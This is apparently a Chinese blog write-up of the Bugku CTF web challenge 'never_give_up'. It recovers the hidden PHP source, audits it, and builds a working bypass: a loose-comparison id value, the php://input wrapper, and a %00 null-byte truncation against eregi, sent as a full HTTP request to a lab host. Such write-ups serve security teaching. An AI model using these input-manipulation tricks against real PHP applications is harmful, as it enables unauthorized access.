never_give_up——bugku_控制台看nevergiveup-CSDN博客

本文链接：https://blog.csdn.net/m0_46607055/article/details/121052747

前言

一个很老的题目了。两前年有个投机取巧的题解。直接访问 f4l2a3g.txt 得到flag。现在修复了，必须按部就班的做。

那、来吧。

解题过程

访问靶场、查看源码，发现有1p.html

访问会跳转到 https://www.bugku.com/

用burp拦截一下试试

（写笔记复现的时候没有拦截成功。但是第一遍确实是没问题的。）

在p1.html的源码里发现有注释

<!--JTIyJTNCaWYoISUyNF9HRVQlNUInaWQnJTVEKSUwQSU3QiUwQSUwOWhlYWRlcignTG9jYXRpb24lM0ElMjBoZWxsby5waHAlM0ZpZCUzRDEnKSUzQiUwQSUwOWV4aXQoKSUzQiUwQSU3RCUwQSUyNGlkJTNEJTI0X0dFVCU1QidpZCclNUQlM0IlMEElMjRhJTNEJTI0X0dFVCU1QidhJyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJ2InJTVEJTNCJTBBaWYoc3RyaXBvcyglMjRhJTJDJy4nKSklMEElN0IlMEElMDllY2hvJTIwJ25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJyUzQiUwQSUwOXJldHVybiUyMCUzQiUwQSU3RCUwQSUyNGRhdGElMjAlM0QlMjAlNDBmaWxlX2dldF9jb250ZW50cyglMjRhJTJDJ3InKSUzQiUwQWlmKCUyNGRhdGElM0QlM0QlMjJidWdrdSUyMGlzJTIwYSUyMG5pY2UlMjBwbGF0ZWZvcm0hJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuKCUyNGIpJTNFNSUyMGFuZCUyMGVyZWdpKCUyMjExMSUyMi5zdWJzdHIoJTI0YiUyQzAlMkMxKSUyQyUyMjExMTQlMjIpJTIwYW5kJTIwc3Vic3RyKCUyNGIlMkMwJTJDMSkhJTNENCklMEElN0IlMEElMDklMjRmbGFnJTIwJTNEJTIwJTIyZmxhZyU3QioqKioqKioqKioqJTdEJTIyJTBBJTdEJTBBZWxzZSUwQSU3QiUwQSUwOXByaW50JTIwJTIybmV2ZXIlMjBuZXZlciUyMG5ldmVyJTIwZ2l2ZSUyMHVwJTIwISEhJTIyJTNCJTBBJTdEJTBBJTBBJTBBJTNGJTNF-->

经 base 64编码再经 url解码

得到php的代码


";if(!$_GET['id'])
{
	header('Location: hello.php?id=1');
	exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
	echo 'no no no no no no no';
	return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
	$flag = "flag{***********}"
}
else
{
	print "never never never give up !!!";
}


?>

审计一下：

主要函数：

stripos函数：返回指定字符的位置。题目中就是返回 “.”在 $a 的位置。配合上if，就是a中不能有 .

file_get_contents:读取指定的文件。题目中是要读取名称为 a 的文件。并赋值给 data

eregi：这个函数跟 preg_match函数功能一样，实现匹配。但是已经弃用。详情见：实验吧-PHP大法-eregi()函数 - 雨九九 - 博客园题目的意思是，经过 substr 的变量b 再拼接字符串 111 ，用拼接后的字符串匹配 1114 。

所以一共有以下限制条件：

1、id传参必须存在，且等于0

2、a传参不能有 .

3、必须读取到名为a 的文件，且文件内容是：bugku is a nice plateform!

4、b传参长度大于5

5、b的第一个字符不能等于4，且截取后要与 1114 匹配

此外还有个隐形条件。

传入 id = 0 。会自动跳转到 id =1

猜测这里也有一部分检测。

绕过方法：

1、id用弱类型比较。 0xg 等于 0 。（只要是大于十六进制e的字符都可以）

2、利用php伪协议。

a=php://input

post传入：bugku is a nice plateform!

3、利用00截断绕过 eregi

eregi("111".substr($b,0,1),"1114")

b传入 %0012345 , 经过substr截取空格，再与111拼接。函数在处理 111 时，遇见空格，会丢弃空格及后面的数据，即 111 变成111，此时 111在1114里面了。

所以最终的payload

GET /hello.php?id=0xg&a=php://input&b=%0012345 HTTP/1.1
Host: 114.67.246.176:19420
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 26

bugku is a nice plateform!